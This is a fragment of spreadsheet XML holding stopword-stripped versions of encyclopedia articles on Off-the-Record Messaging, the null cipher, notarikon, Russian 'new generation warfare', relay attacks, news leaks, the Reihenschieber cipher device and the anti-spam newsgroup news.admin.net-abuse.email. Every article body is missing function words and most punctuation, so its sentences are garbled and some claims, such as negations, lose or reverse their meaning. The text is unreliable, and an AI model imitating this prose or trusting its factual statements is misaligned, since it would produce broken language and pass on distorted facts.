submitted xmpp standards foundation standardisation.currently, version protocol designed. presented sofía celi bini pets2018. implementation addition providing encryption authentication features also provided typical public-key cryptography suites, pgp, gnupg, x.509 (s/mime) also offers less common features: forward secrecy: messages encrypted temporary per-message keys, negotiated using diffie–hellman exchange protocol. compromise long-lived cryptographic keys compromise previous conversations, even attacker possession ciphertexts. deniable authentication: messages conversation digital signatures, conversation complete, anyone able forge message appear come participants conversation, assuring impossible prove specific message came specific person. within conversation recipient sure message coming person identified. authentication 3.1, protocol supports mutual authentication users using shared secret socialist millionaire protocol. this feature makes possible users verify identity remote party avoid man-in-the-middle attack without inconvenience manually comparing public fingerprints outside channel. limitations limitations protocol, support multi-user group chat 2009 implemented future. version protocol specification, extra symmetric derived authenticated exchanges used secure communication (e.g., encrypted file transfers) different channel. support encrypted audio video planned. (srtp zrtp exists purpose.) project produce protocol multi-party off-the-record messaging (mpotr) organized cryptocat, equalitie, contributors including goldberg.since protocol (libotr 4.0.0) plugin supports multiple conversations buddy logged multiple locations. client support native (supported project developers) these clients support off-the-record messaging box. (incomplete list) third-party plug-in following clients require plug-in off-the-record messaging. hexchat, third-party plugin miranda (microsoft windows), third-party plugin pidgin (cross-platform), plugin available homepage weechat, third-party plugin hexchat, *nix versions, third-party plugin confusion google talk "off record" although gmail's google talk uses term "off record", feature connection off-the-record messaging protocol described article, chats encrypted described above—and could logged internally google even accessible end-users. also free software portal references further reading joseph bonneau; andrew morrison march 2006). "finite-state security analysis version (pdf). retrieved september 2013. {{cite journal}}: cite journal requires |journal= (help) mario raimondo; rosario gennaro hugo krawczyk (2005). "secure off-the-record messaging" (pdf). proceedings 2005 workshop privacy electronic society. association computing machinery. retrieved august 2013. {{cite journal}}: cite journal requires |journal= (help) external links official website protocol specification off-the-record messaging: useful security privacy talk goldberg university waterloo (video) 'off-the-record' instant messaging tutorial (encryption, authentication, deniability, youtube</t>
  </si>
  <si>
    <t>Neutral unit of construction</t>
  </si>
  <si>
    <t>neutral unit construction neutral unit currency (code: nuc) private currency used airline industry, record fare calculation information. exchange rates issued international transport association (iata) every month. ticket component prices converted original currency country commencement travel) recorded airline ticket.the system came july 1989, superseded older "fare construction unit" (fcu) system. 2008, depends (country commencement) travel. each country strong currency iroe (iata rate exchange) too.a similar unit, formerly used european railway industry, franc (xfu). references</t>
  </si>
  <si>
    <t>Null cipher</t>
  </si>
  <si>
    <t>null cipher, also known concealment cipher, ancient form encryption plaintext mixed large amount non-cipher material. today regarded simple form steganography, used hide ciphertext. classical cryptography classical cryptography, null intended confuse cryptanalyst. null cipher, plaintext included within ciphertext needs discard certain characters order decrypt message (such first letter, last letter, third letter every second word, etc.) most characters cryptogram nulls, significant, others used pointers significant ones.here example null cipher message, sent german world president's embargo ruling should have immediate notice. grave situation affecting international law. statement foreshadows ruin many neutrals. yellow journals unifying national excitement immensely. taking first letter every word reveals hidden message "pershing sails n.y. june here complicated example england's civil aided royalist john trevanian escape puritan castle colchester:worthy john, hope, that best comfort afflicted, cannot much, fear help now. that would you, this only: ever able requite that you, stand upon asking much that what very sure will. know that, death comes, ordinary fear frights you, accounting high honour, have such reward your loyalty. pray spared this bitter, cup. fear that will grudge sufferings; only submissions turn them away, part wise man. tell can, anything that would have done. general goes back wednesday. restinge your servant command.the third letter punctuation reveals "panel east side chapel slides". similar technique hide entire words, seemingly innocent message written prison inmate deciphered fbi: taking every fifth word, reconstruct hidden text recommends "hit" someone: other options include positioning significant letters next certain intervals punctuation marks particular characters. historically, users concealment ciphers often used substitution transposition ciphers data prior concealment. example, cardinal richelieu said used grille write secret messages, blank spaces filled extraneous matter create impression continuous text. null cipher pinprick null cipher common classical encryption method pinprick placed certain letters piece writing. aeneas tacticus wrote book defense fortifications. germans upgraded invisible world world england pinpricks newspapers popular send letters little cost. place dots apart, could used well. make sure keep dots small something makes sense advanced computer coding books package deliverers unless clearly indicated interested also need know page, chapter, article, section used, plan system find several places. another option indicator, date newspaper, shows page message this version less secure. definition null simply, null cipher cipher involves number nulls, decoy letters. well methods shown above, null cipher could plaintext words nulls placed designated areas even plaintext message broken different positions null word. however, message couple nulls (for example, beginning end) null cipher. null ciphers related acrostic. usage general, difficult time-consuming produce covert texts seem natural would raise suspicion, unable advanced encryption method plenty time, might good option. actual encryption involved, security message relies entirely secrecy concealment method. null ciphers modern times used prison inmates attempt messages pass inspection. also transposition cipher substitution ciphers acrostic nulls references</t>
  </si>
  <si>
    <t>Notarikon</t>
  </si>
  <si>
    <t>notarikon (hebrew: נוטריקון noṭriqōn) talmudic kabbalistic method deriving word, using initial (hebrew: ראשי תיבות‎) final letters (סופי תיבות‎) stand another, form sentence idea words. another variation uses first last letters, middle letters word, order form another word. word "notarikon" borrowed greek language (νοταρικόν)), derived latin word "notarius" meaning "shorthand writer."notarikon three ancient methods used kabbalists (the gematria temurah) rearrange words sentences. these methods used order derive esoteric substratum deeper spiritual meaning words bible. notarikon also used alchemy. term mostly used context kabbalah. common hebrew abbreviations described ordinary linguistic terms. usage talmud until talmudic period, notariqon understood judaism common method scripture interpretation letters individual words bible text indicate first letters independent words. example, consonants word nimreṣet (1kgs 2:8) produce words noʾef (adulterer), moʾābı (moabite), roṣeaḥ (murderer), ṣorer (threatener) tôʿbāh (horror). according talmudic interpretation, starting word indicates insults shimei thrown king david. usage kabbalah common usage notarikon practice kabbalah, form sacred names derived religious biblical verses. agla, acronym atah gibor le-olam adonai, translated, "you, lord, mighty forever," famous examples notarikon. dozens examples found berit menuchah, referenced following passage: discovered malachim created wind fine enlightening air, name origin עַמַרֻמְאֵליוְהָ derived verse (psalms 104:4): "who makest winds messengers, fire flame ministers" lights reach sefira, unite receive name derived central letters following verse (genesis 6:2): "the sons daughters fair; took wife chose." valiant name, drawn gevura, רְנֵלבֺנקְהֵכשְיִהְ‎. sefer gematriot another example many notarikons usage talismans given biblical verses. also agla, notarikon atah gibor le-olam adonai bible code, purported secret messages encoded within torah. biblical talmudic units measurement chol hamoed, intermediate days passover sukkot. chronology bible counting omer gematria, jewish system assigning numerical value word phrase. hebrew acronyms hebrew calendar hebrew numerals jewish israeli holidays 2000–2050 baomer, 33rd counting omer. sephirot, attributes/emanations found kabbalah. significance numbers judaism weekly torah portion, division torah portions. references</t>
  </si>
  <si>
    <t>New generation warfare</t>
  </si>
  <si>
    <t>generation warfare (russian: война нового поколения) russian theory unconventional warfare prioritizes psychological people-centered aspects traditional military concerns, emphasizes phased approach non-military influence armed conflict, arises, much less costly human economic terms aggressor otherwise would numerous analysts cite 2014 russian annexation crimea donbas specific examples followed guidelines generation warfare. according analyst, "the russian view modern warfare based idea main battlespace mind and, result, new-generation wars dominated information psychological warfare, morally psychologically depressing enemy’s armed forces personnel civil population. main objective reduce necessity deploying hard military power minimum necessary." terminology term generation warfare first introduced russian (война нового поколения) 2013, terms grey zone hybrid warfare, related gerasimov doctrine. these terms refer modern military theories warfare beyond conventional warfare. terms began spread take various meanings, always used clarity. some analysts less interchangeably, others identify differences among them.in 2009 paper, frank hoffman noted rising term hybrid threat, analyzed multiple meanings term. hoffman pointed resistance among analysts term, preferred older concepts "conventional" "irregular" warfare, hoffman believed older terms insufficient describe conflicts modern world. defined hybrid threat adversary "simultaneously adaptively employs fused conventional weapons, irregular tactics, terrorism criminal behavior battle space obtain political objectives".since introduced, term hybrid warfare become trendy used often debates modern warfare. term gone various stages evolution meaning, criticized overused. term used official doctrines nations, permeates academic policy discussions. meaning extended non-state actors, shifted synonymous "malign russian activities" vladimir putin. first, term used russia, recently adopted undergone shifting usage: ukraine tended refer trends american military thinking, 2014 russia views hybrid warfare entirely emanating west, every conflict anywhere world, wars sports vaccination eurovision song contest aspects "hybrid warfare" waged west. west hand views preventing subversion interference russia, including cyberwarfare.russia created concept generation warfare, also absorbed hybrid warfare term. according suchkov (2021), difference russian analysts generation warfare outward-facing, i.e., "how pro-actively engage foreign adversaries", whereas hybrid warfare defend interference west. background cold period geopolitical tension united states soviet union respective allies, western bloc eastern bloc, began following world lasted dissolution soviet union 1991. period openness last soviet leader mikhail gorbachev first post-soviet boris yeltsin ended 1999 accession power vladimir putin, took harder line sought reestablish russia world power sphere influence including former soviet republics. cold soviet union allied powers world fighting side united states defeat nazis. after victory hitler 1945, allies disagreed europe look like borders would drawn. soviets effectively occupied central eastern europe, western allied forces remained western europe. soviet union sought establish sphere influence dominate internal affairs countries border regions. soviet-style regimes arose eastern bloc.the government pursued increasingly hard line soviets, prime minister winston churchill delivered famous "iron curtain" speech fulton, missouri called anglo-american alliance soviets. stalin dismissed accusation ussr exerting increasing control countries sphere. argued nothing surprising "the fact soviet union, anxious future safety, [was] trying governments loyal attitude soviet union exist countries".forty years simmering tensions, rearmament, proxy wars followed nuclear-armed nations, allies. western bloc created nato protect western europe contain soviets, soviets created warsaw pact response, uniting eastern european countries behind iron curtain. direct armed conflict nuclear-armed superpowers avoided (sometimes barely), berlin crisis 1961 cuban missile crisis. 1960s, united states became bogged "quagmire" vietnam attempt contain communism; twenty years later russians bogged afghanistan; superpower left asian without victory. conflicts multiplied third world nations, including latin america, indonesia, israel, south asia, africa. after period détente 1970s, tensions reawakened 1980s president ronald reagan "went fight second cold war". pope john paul provided moral focus anti-communism; visit native poland 1979 stimulated religious nationalist resurgence centered solidarity movement galvanized opposition, harsh crackdown 1981. thaw cold massive spending soviet union arms race exacerbated already deep-seated structural problems soviet system, response massive buildup soviet side, presidents carter reagan built military, culminating strategic defense initiative ("star wars"), soviets able respond 1985, mikhail gorbachev became general secretary, soviet economy stagnant. gorbachev announced economic reforms called perestroika, restructuring. glasnost ("openness") increased freedom press transparency state institutions. this contributed accelerating détente nations, resulting agreements scaling-back arms race. tensions subsided; start arms control treaty signed, soviet forces withdrew afghanistan, berlin wall came 1989. december 1989, gorbachev bush declared cold malta summit. 1990, gorbachev consented german reunification, later year former rivals partners gulf iraq. dissolution soviet union 1989, soviet alliance system brink collapse communist leaders warsaw pact states losing power. pan-european picnic august 1989 hungary became test soviet leader gorbachev willing glasnost. thousands holiday-makers exited hungary border austria without interference hungarian border guards, soviet union nothing stop broke, tens thousands east germans crossed austria. hungarian borders opened september, berlin wall fell november. 1989 revolutionary wave swept across central eastern europe peacefully overthrew soviet-style east-european states; romania eastern-bloc country topple communist regime violently. warsaw pact disintegrated 1991.greater political social freedoms soviet union instituted last soviet leader mikhail gorbachev created atmosphere open criticism. soviet union finally collapsed 1991 boris yeltsin seized power aftermath failed coup attempted topple reform-minded gorbachev. baltic states seceded, ukraine belarus recognized independent december. soviet flag lowered kremlin last time december 1991, replaced russian tricolor. successor state headed yeltsin 1999. putin since 1999 vladimir putin headed russia either president prime minister. economy improved, also widely accused corruption, authoritarian leadership, widespread human rights abuses. content article copied cold war, history soviet union (1982–1991), history russia (1991–present); articles' histories attribution. precursors phillip karber national geospatial intelligence agency identified 1999 former agent vladimir putin came power russia "pivotal turning point european security". putin stated "the collapse soviet union greatest geopolitical catastrophe century." ever since, putin labored reestablish russia world power dominance eastern europe, pushed restructure armed forces, introduced tactics 2000 second chechen war.the russian army general staff redesigned russian army decentralized operations including possibility unconventional operations, conventional weapons, tactical nuclear environments, order face different kinds threats high-tech west, massed armies east, unconventional threats south. this used 2008 georgian conflict, practiced field simulations nato, 2013. also 2013 publications russian military writers "new generation warfare" became available, chief general staff general valery gerasimov called "rethinking forms methods warfare." many analysts consider gerasimov doctrine best description russia's modern strategy total warfare, uses politics well war, attacks multiple fronts including hackers, business, media, disinformation, well military means. internet made available possibility tools approaches destabilize influence foreign actors, gerasimov doctrine describes framework using them, says adjuncts military force, fact, primary preferred means victory. strategy foment chaos within enemy state, develop permanent unrest conflict there. west point analyst john chambers uses terms gerasimov doctrine generation warfare synonymously. chambers views gerasimov/new generation warfare doctrine formulated specifically exploit weaknesses large enemy bureaucracies united states. gerasimov doctrine foreign policy doctrine named february 2013 publication artile valery gerasimov, russian chief general staff, laid theory modern warfare combining soviet tactics strategic military thinking total based societal aspects traditional military ones. gerasimov wrote:the 'rules war' changed. role nonmilitary means achieving political strategic goals grown, and, many cases, exceeded power force weapons effectiveness. supplemented military means concealed character. prime example gerasimov doctrine field, 2014 unrest ukraine, russia supported extremists sides exacerbate tensions create unrest, used unrest pretext take crimea. aspects previous military strategies focused traditional military concerns supplies, logistics, strength location enemy forces, battleground mind public. russian warfare analyst janis berzins wrote: thus, russian view modern warfare based idea main battlespace mind and, result, new-generation wars dominated information psychological warfare, order achieve superiority troops weapons control, morally psychologically depressing enemy’s armed forces personnel civil population." characterizing emphasis mind, berzins describes theory prioritizing "influence destruction; inner decay annihilation; culture weapons technology", "total battlespace" includes "political, economic, informational, technological, ecological" aspects. goal implement theory eight phases, starting long military conflict. "phase zero" preparing terrain implementing psychological, informational, measures prevent conflict.chambers views generation warfare designed grey-zone hybrid threats, focused using non-military means achieving political strategic goals well military means concealed character' include open forces 'often guise peacekeeping crisis regulation' accomplish objectives. these tactics techniques particularly effective united states gray zone laws regulations affecting ability phase strategic communication generation warfare, communications media used uphold narrative aimed international community well domestic audience, using language evade usual deterrence whip support home operations characterize legal uses force support "protection self-defense russian nationals" living donbas crimea, invitation intervention local leaders object years softening russians preparatory phases. surface, russia appears claims acting support self-defense sovereignty, supported article charter, supported acts russian parliament. generation warfare seeks take acts realm military action, unclear armed attack has, fact, occurred, confusing enemy's ability define response military attack respond one. elements defense national security expert ukraine phillip karber identified five elements generation warfare: political subversion intelligence agents; agit-prop operations using mass media exploit internal differences; corruption, bribery intimidation local officials; kidnapping, assassination terrorism; creating local opposition cells discontented elements proxy sanctuary seizing local government centers power, airports military depots; arming training insurgents; creating checkpoints; destroying ingress transportation infrastructure; cyberattacks; phony referendums; establishment "people’s republic" russian domination. intervention deploying russian forces border large-scale exercises involving ground, naval, force troops; clandestine introduction heavy weapons insurgents; creation training logistics camps adjacent border; integrating proxy troops russian equipped formations. coercive deterrence secret strategic force alerts; deployment tactical nuclear delivery systems; theater intercontinental maneuvers; aggressive patrolling ajdacent areas limit freedom movement. negotiated manipulation abuse western negotiated ceasefires regroup rearm proxies; using violations tactic, inhibiting states helping fear escalation; split western alliance using economic incentives; selective repetitive phone negotiations nowhere.chambers compared russian generation warfare planning processes american ones, identified eight-phases construct russian side, phases american side. they line well, first four phases fall within phase planning, latter requiring interagency planning communication, slowing down, russian process designed nimble work within phases. chambers puts "the fundamental problem countering operations gray zone takes place united states cannot clearly identify gray-zone actors actions (ambiguity) develop clear common operating picture actions taking place. case, united states constrained bureaucracy likely authorize operations clear threat. point, late adversary already used gray-zone operations shape battlefield achieve strategic objectives." practice generation warfare theory became used practice crimea donbas 2014, russia's proxy ukraine. karber stated practiced ukraine, russia's generation warfare manifested five component elements: political subversion, proxy sanctuary, intervention, coercive deterrence, negotiated manipulation."the invasion crimea carried quietly using excuse humanitarian intervention. three weeks less 10,000 troops, russia managed dislodge crimea ukraine annex without shot fired, surrender ukrainian bases russians. ground prepared long before, multi-pronged "soft" approach including bribing local officials, paying oligarchs, providing local separatists intelligence information, investing heavily local ukrainian energy industrial businesses, continual emission pro-russian propaganda networks owned funded russia, process deception known "maskirovka" ("camouflage" russian) hide operations. thing domestically, vast control local print media, especially television reporting, dominant news source population country.the strong governmental control media gives direct pipeline influence public opinion country. public support media high, believing europe united states involved "information war" manipulate russian media, russian government merely reports facts.accompanying russian aggression ground ukraine 2014, russia made direct nuclear threats ukraine, earlier given nuclear weapons 1994 budapest agreement exchange explicit guarantees sovereignty moscow. russia continued push limits, operating close nato borders dangerous over-flights, demonstrations nuclear force, hostile wargame exercises, causing anxiety among border nato member countries well neutral countries. compared theories russia's generation warfare differs hybrid warfare combines low-end, clandestine operations high-end direct superpower involvement. also references works cited karber, phillip january 2022). "'putin stupid': this expert spent days russia-ukraine battlefields". 19fortyfive. retrieved march 2022. "1989: malta summit ends cold war". bbc. december 1989. archived original october 2018. retrieved march 2022. berzins, janis (april 2014). russia's generation warfare ukraine: implications latvian defense policy (pdf) (report). national defence academy latvia center security strategic research. 1–13. retrieved march 2022. carliner, geoffrey; alesina, alberto, eds. (1991). politics economics eighties. university chicago press. isbn 978-0-226-01281-0. chambers, john (2016-10-18). "countering gray-zone hybrid threats. analysis russia's 'new generation warfare' implications army" (pdf). modern institute west point. retrieved 2022-03-04. clines, francis (december 1991). "gorbachev, last soviet leader, resigns; u.s. recognizes republics' independence". york times. a–1. retrieved march 2022. diggins, john (2007). ronald reagan: fate, freedom, making history. w.w. norton. isbn 978-0-393-06022-5. deutsche welle august 2014). "the picnic changed european history". akademie. retrieved march 2022.{{cite web}}: maint: url-status (link) echevarria antulio (2015). "how think 'grey-zone' wars?". infinity journal. infinity group. (1): 16–21. issn 2312-5888. archived original august 2020. retrieved march 2022. analysts, practitioners, scholars alike struggled come terms uses, assigning labels 'hybrid wars', 'new generation wars', 'gray-zone' conflicts, among others, distinguish contemporary practices so-called traditional wars. while original labeling relabeling draw attention busy policymakers emerging security issues, evolved something culture replication labels repeated habit reflection. fedyk, nicholas (2016). "russian 'new generation' warfare—theory, practice, lessons u.s. strategists". small wars journal. (6): 2–8. retrieved march 2022. gaddis, john lewis (2005). cold war: history. penguin press. isbn 978-1-59420-062-5. gaidar, yegor (2007-04-19). "the soviet collapse: grain oil" (pdf). issues: online. american enterprise institute. retrieved march 2022. gerasimov, valery (february 2013). "ценность науки предвидении" [the value science foresight]. ru:военно-промышленный курьер [military-industrial courier] (weekly newspaper) russian). (8). gibbs, joseph (1999). gorbachev's glasnost: soviet media first phase perestroika. texas university press. isbn 0-89096-892-6. "collapse soviet union 1989-1991". globalsecurity. 2022. retrieved march 2022. above all, acknowledge collapse soviet union major geopolitical disaster century. hoffman, frank (october 2009). "hybrid compound janus choice". armed forces journal. (3). retrieved march 2022 ebscohost. karber, phillip june 2015). "russia's generation warfare". nga.mil. national geospatial intelligence agency. archived original september 2015. mccauley, martin (2008). origins cold war, 1941–1949. seminar studies history (revised ed.). harlow, england; york: pearson longman. isbn 978-1-4058-7433-5. oclc 191732526. mckew, molly september 2017). "the gerasimov doctrine". politico. newman, william (1993). "history accelerates: diplomacy co-operation fragmentation". goodby, james morel, benoit (eds.). limited partnership: building russian-us security community. oxford: oxford university press. isbn 978-0-19-829161-9. archived original july 2020. retrieved march 2022. "jānis bērziņš biography generation warfare centre". archived original march 2020. retrieved march 2022. roht-arriaza, naomi (1995). impunity human rights international practice. oxford university press. isbn 0-19-508136-6. schmitz, david (1999). "cold (1945–91): causes". whiteclay chambers, john (ed.). cold (1945–91). oxford companion american military history. oxford university press. 147–149. isbn 978-0-19-507198-6. oclc 769463173. retrieved june 2008. suchkov, maxim (2021). "whose hybrid warfare? 'the hybrid warfare' concept shapes russian discourse, military, political practice". small wars insurgencies. (3): 415–440. doi:10.1080/09592318.2021.1887434. s2cid 233353066. towle, philip (2000). "cold war". charles townshend (ed.). oxford history modern war. york: oxford university press. isbn 978-0-19-285373-8. further reading berzinš, janis (march 2014). "the generation russian warfare". aspen review. prague: aspen institute. archived original 2015-10-21. berzins, janis february 2019). "not 'hybrid' generation warfare". howard, glen; czekaj, matthew (eds.). russia's military strategy doctrine. washington: jamestown foundation. 157–184. isbn 978-0-9986660-1-3. oclc 1036275039. berzins, janis december 2020). "the theory practice generation warfare: case ukraine syria". journal slavic military studies. routledge. (3): 355–380. doi:10.1080/13518046.2020.1824109. issn 1351-8046. oclc 8886456291. s2cid 229182086. chekinov, sergei bogdanov, sergei (2011). "влияние непрямых действий характер современной войны" [the influence indirect actions nature modern warfare]. военная мысль military thought. moscow: star (6): 3–13. issn 0236-2058. chekinov, sergei bogdanov, sergei (2013). "the nature content new-generation war". semantic scholar: 12–23. s2cid 158510631. derleth, james (september 2020). "russian generation warfare deterring winning tactical level". military review. army command general staff college. issn 1943-1147. retrieved march 2022. fisher, (2016-07-25). d.n.c. hack, echoes russia's approach power". york times. issn 0362-4331. galeotti, mark march 2018). "i'm sorry creating 'gerasimov doctrine'". foreign policy. slate group. galeotti, mark (2018). "the mythical 'gerasimov doctrine' language threat". critical studies security. informa limited. (2): 157–161. doi:10.1080/21624887.2018.1441623. issn 2162-4887. oclc 8319522816. mölder, holger; sazonov, vladimir july 2018). "information warfare hobbesian concept modern times principles, techniques, tools russian information operations donbass". journal slavic military studies. t&amp;f. (3): 308–328. doi:10.1080/13518046.2018.1487204. s2cid 150108658. murphy, martin. "understanding russia's concept total europe". heritage foundation. paul, christopher; matthews, miriam (2016). russian 'firehose falsehood' propaganda model: might work options counter (report). rand perspective #198. santa monica: rand. doi:10.7249/pe198. oclc 1038179818. pe-198-osd. pierzchala, kazimierz (march 2019). "information warfare between russia ukraine: cause west?". polish political science yearbook. (1): 103–111. doi:10.15804/ppsy2019106. s2cid 159071488 ebscohost. renz, bettina; smith, hanna (2016). russia hybrid warfare going beyond label (report). aleksanteri papers. kikimora publications. issn 1457-9251.</t>
  </si>
  <si>
    <t>Relay attack</t>
  </si>
  <si>
    <t>relay attack (also known two-thief attack) computer security type hacking technique related man-in-the-middle replay attacks. classic man-in-the-middle attack, attacker intercepts manipulates communications parties initiated parties. classic relay attack, communication parties initiated attacker merely relays messages parties without manipulating even necessarily reading them. example attack peggy works high security building accesses using smart card purse. when approaches door building, building detects presence smart card initiates exchange messages constitute zero-knowledge password proof card peggy's. building allows peggy enter. mallory wants break building. mallory approaches building device simulates smart card, building responds initiating exchange messages. mallory forwards message accomplice evelyn tailing peggy runs errands another part town. evelyn relays message peggy's smart card, listens answer, forwards answer mallory, relays building. continuing way, mallory evelyn relay messages building peggy's smart card building satisfied communicating peggy's smart card. building opens mallory enters. references external links academic survey relay attacks detailed practical example relay attack rfid system relay attack demonstration (and related software paper) practical relay attack contactless transactions using mobile phones</t>
  </si>
  <si>
    <t>News leak</t>
  </si>
  <si>
    <t>news leak unsanctioned release confidential information news media. also premature publication information news outlet, information agreed release specified time, violation news embargo. types leaks often made employees organization happened access interesting information officially authorized disclose press. they believe public interest need speedy publication, otherwise would able made public, rally opinion side internal debate. this type leak common; former white house advisor sidney souers advised young scholar 1957, "there leaks washington, plants."on hand, leaks sometimes made simply self-promotion, elevate leaker person importance. leaks intentional unintentional. leaker journalist personal favor (possibly exchange future cooperation), simply wishes disseminate secret information order affect news. latter type leak often made anonymously. sometimes partial information released media record advance press release "prepare" press public official announcement. this also intended allow journalists time prepare extensive coverage, published immediately official release. this technique designed maximize impact announcement. might considered element political 'spin', news management. some people leak information media seeking manipulate coverage. cloaking information secrecy make seem valuable journalists, anonymity reduces ability others cross-check discredit information.some leaks made open; example, politicians (whether inadvertently otherwise) disclose classified confidential information speaking press. leaks strong consequences. president richard nixon enraged existence leaks, according former staffer william safire, rage coupled president's lifelong disdain press environment nixon's downfall. most immediately, fear leaks pentagon papers published 1971, secret bombing cambodia, formation "white house plumbers" unit named wanted leaks), conducted break-in watergate scandal nixon's eventual resignation 1974. reasons there many reasons information might leaked. some include: politicians policy makers wish judge reaction public plans committing trial balloon). leaked information plausibly denied without blame proposed unpopular measures affecting perpetrators. people access confidential information find advantage make public, without appearing responsible publishing information. example, information embarrass political opponents, cause damage national security, leaked. people privy secret information matters consider morally wrong public interest often referred "whistleblowers" leak information. people enticed expose secret information self-serving motives, financial gain. notable international panama papers, confidential documents leaked april 2016 regarding offshore havens. paradise papers, confidential documents leaked november 2017 regarding offshore havens. fincen files collection fincen documents brought public's attention september 2020. pandora papers, confidential documents leaked october 2021 regarding offshore havens. united states leaks press commonly made sides u.s. government's internal debate august 1949–january 1950 regarding whether proceed development hydrogen bomb. pentagon papers, top-secret united states department defense history united states' political-military involvement vietnam 1945 1967. made public front page york times 1971. source known deep throat, later identified deputy director mark felt, leaked information related watergate scandal washington post reporter woodward. columnist robert novak published leak, outing agent valerie plame 2003. reported senate intelligence committee report torture, deliberately planted false stories media mislead public, claiming stories leaked. united states diplomatic cables leak november 2010 organisation wikileaks began releasing details 251,287 diplomatic cables provided chelsea manning. leaks june 2013, employee edward snowden leaked secret documents exposing american prism british tempora, clandestine espionage programs. vault leaks march 2017 employee joshua adam schulte leaked secret documents exposing capabilities perform electronic surveillance cyber warfare. united kingdom spies peace, group british anti-war activists associated committee publicised government preparations rule nuclear war. 1963 broke secret government bunker photographed copied documents. they published information pamphlet, danger! official secret rsg-6. four thousand copies sent national press, politicians peace movement activists. leaks june 2013, employee edward snowden leaked secret documents exposing british tempora american prism clandestine espionage programs. israel mordechai vanunu, israeli nuclear technician revealed details israel's nuclear weapons program british press 1986. anat kamm leaked classified documents israeli defense force 2008, suggested israeli military engaged extrajudicial killings. spain time spanish coup july 1936, takeover spanish republican navy coup leaders failed mainly messages calling coup spanish republic sent code, would norm, ciudad lineal senior officers commanding ships. navy radiotelegrapher benjamin balboa took credit news leak. also internet leak globaleaks (software) books references blair jr., clay, silent victory: submarine japan, annapolis, naval institute press, 2001 lanning, michael (lt. col.), senseless secrets: failures u.s. military intelligence george washington present, carol publishing group, 1995 references</t>
  </si>
  <si>
    <t>Reihenschieber</t>
  </si>
  <si>
    <t>reihenschieber (english: slider) hand cipher system used german bundeswehr. developed 1957 used early 1960s, although information system released publicly 1992. system used encrypt high-grade messages. device consists frame "rods" clipped: plastic square sticks containing sequence digits (0–9) dots face. rods used, chosen reihenschieber generated stream pseudo-random digits. these digits used navigate number printed tables create polyalphabetic cipher. references michael meulen: reihenschieber, cryptologia, vol. 20(2), 1996, 141–154. external links information photograph jerry proc</t>
  </si>
  <si>
    <t>News.admin.net-abuse.email</t>
  </si>
  <si>
    <t>news.admin.net-abuse.email (sometimes abbreviated nanae n.a.n-a.e, often incorrectly spelled hyphen "email") usenet newsgroup devoted discussion abuse email systems, specifically spam similar attacks. according timeline compiled keith lynch, news.admin.net-abuse.email first widely available electronic forum discussing spam. steve linford, founder spamhaus project, sometimes posts newsgroup. topics covered original charter following examples "on-topic" areas listed: chain letters attacks email address list email bomb email viruses filtering software large-scale mailings listserv bombs mailing list abuse pyramid schemes unsolicited emaileventually, mutual consent, also determined following also "on-topic": cats superficial/anecdotal level) history group officially proposed (i.e. posted) skirvin (tskirvin) july 1996 alongside number groups order reduce load abuse groups time, news.admin.net-abuse.announce news.admin.net-abuse.misc.later month went vote passed 28.in september 2002 proposed subgroup, news.admin.net-abuse.email.blocklists, created. nanaeisms over time, (more less) nanae-specific terms coined: 404-compliant website terminated hosting provider terms service violation said "404-compliant", reference "not found" status code http parody spammers claiming spam compliant, referring bill never made law. auto-ignore automated response isp's abuse desk, believed sending automated response action take. black enables spamming, example hosting provider upon spam complaints. named westerns guys often wore black hats. compare white gray hat. bulletproof said difficult take action spamming customers. cartooney derisive term used refer hollow lawsuit threat spammer tries intimidate anti-spammer. this term also refer spammer's lawyer (who usually assumed exist). this term portmanteau words cartoon attorney, wherein former term used derisive reference typically comical laughable aspect hollow threat. majority hollow legal threats arise context listed entity threatening blacklist maintainer legal action. cats coffee warning cats coffee warning warning satirical warning usenet posting writing contain humorous material. warning originated usenet group news.admin.net-abuse.email, spread groups. warning admonition reader secure liquid beverages (particularly ones) cats case uncontrollable laughter breaks upon reading article. chew from time time, spammer surfaces group, typically ranting spam control activities, blacklisting, amount censorship violate spammer's right free speech. these visiting spammers referred chew toys (because slight entertainment value tirades provide). chew frequent group several years. there always chew active, seldom concurrently. chickenboner derisive term used refer minor amateur spammer. named colorful humorous description newsgroup participant made spammers living trailers eating kentucky fried chicken. out, standard response posting suspected troll. named regular poster often wrote humorous troll posts. frea speach spammers claim right distribute unsolicited bulk mail part right free speech united states constitution. after person repeatedly misspelled "frea speach", newsgroup participants argued right free speech refers right censored u.s. government nothing right employ services private individuals organizations distribute bulk mail, took referring claimed right "frea speach", deliberately mis-spelling partly parody partly distinguish actual free speech rights. gray whose stance spam matters somewhat ambiguous. terminate spamming customers them. compare black white hat. check request determine reputation given spam matters. also black-, gray- white hat. sending spam made look like came person organization spammer dislikes. spamhaus, spamcop anti-spam organizations often victims these, individual anti-spammers. being joe-jobbed usually taken sign victim must really hurt spammer. lart meme jokingly refers fictitious hypothetical blunt instrument (i.e. luser attitude readjustment tool") whose primary and/or singular purpose metaphorically application introduction understanding (typically internet norms conventions, concept whatsoever) person currently lacking understanding. large mallets anvils popularly referred examples items tools would useful larts. listwashing responding complaints removing complainer's email address spammer's list, without taking actions spammer. lumber cartel tongue-in-cheeck conspiracy theory claimed anti-spammers secretly paid agents lumber companies. mainsleaze spam coming notable well-known ("mainstream") company. netscum list anti-spam activists published sanford wallace (also known spamford wallace). pink contract contract internet services hosting makes difficult impossible terminate contract spamming. quirk objection 'objection! assumes found evidence!' humorous objection, raised previous poster assumes presence something proven exist. used refer things definitely proven exist. named regular poster 'captain quirk' first raised this. often shortened obquirk! sock poster suspected someone else (usually spammer) using name. shortened sock puppet. spamhaus originally, term used derogatory epithet refer individual mostly spammers customers. nowadays, often refers anti-spam organization name. spamware software written explicitly purpose spamming, features mostly useful spammers abusers. also called 'ratware'. tinlc there lumber cartel tinw there poster recognizes nanae collective opinion. whack-a-mole repeatedly causing spammers' throwaway accounts drop boxes terminated. named whack-a-mole arcade game. white takes spam complaints seriously terminates offenders swiftly extreme prejudice. named westerns good guys usually wore white hats. compare black gray hat. references external links news.admin.net-abuse.email news.admin.net-abuse.email nntp news.admin.net-abuse.email google groups rules spam rules keeper (backup copy)</t>
  </si>
  <si>
    <t>News</t>
  </si>
  <si>
